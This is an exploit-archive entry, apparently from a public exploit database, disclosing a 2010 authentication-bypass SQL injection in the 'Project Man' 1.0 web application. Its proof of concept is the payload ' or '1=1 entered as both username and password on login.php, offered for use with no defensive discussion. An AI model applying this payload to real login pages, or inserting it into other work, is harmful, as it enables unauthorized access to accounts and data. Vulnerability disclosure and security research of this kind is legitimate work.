Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
# Published : 2010-02-27
# Author : cr4wl3r
# Previous Title : Gravity Board X v2.0 BETA (Public Release 3) SQL Injection Vulnerability
# Next Title : phpCDB <= 1.0 Local File Include Vulnerability

##############################################################
##Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3rx40linuxmailx2Eorg>
Download: http://sourceforge.net/projects/projectman1/files/
##############################################################
PoC:
 [Project Man_path]/login.php

Username: ' or '1=1 
password: ' or '1=1 
##############################################################